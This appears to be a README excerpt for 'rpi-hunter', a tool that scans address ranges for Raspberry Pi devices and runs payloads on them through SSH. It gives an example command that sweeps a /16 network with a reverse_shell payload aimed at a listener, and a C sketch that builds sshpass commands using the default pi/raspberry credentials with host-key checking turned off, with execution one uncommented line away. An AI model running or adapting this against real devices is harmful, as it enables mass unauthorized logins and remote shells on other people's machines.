  • Example usage: ./rpi-hunter.py -r 192.168.0.0/16 --payload reverse_shell -H 127.0.0.1 -P 1337
  • Run ./rpi-hunter.py --list to see available payloads.
  • Payloads can be specified by the payload name from --list or as raw input
    • ex. --payload reverse_shell or --payload [your cli command here]
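Under the hood the tool wraps its payload in an sshpass command (which the --safe option prints instead of executing). As an illustration only, and in C rather than the tool's own python, the sketch below builds that kind of command against the default Raspbian pi/raspberry credentials; the IP and payload defaults are placeholders.

/* Sketch of the sshpass command rpi-hunter-style tools run per target.
 * Prints the command (like --safe); uncomment system() to execute it. */
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
    const char *ip      = (argc > 1) ? argv[1] : "192.168.1.50";   /* placeholder */
    const char *payload = (argc > 2) ? argv[2] : "whoami";
    char cmd[1024];

    snprintf(cmd, sizeof(cmd),
             "sshpass -p raspberry "
             "ssh -o StrictHostKeyChecking=no pi@%s '%s'",
             ip, payload);

    printf("%s\n", cmd);        /* --safe behaviour: show, don't run */
    /* return system(cmd); */   /* actual execution */
    return 0;
}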

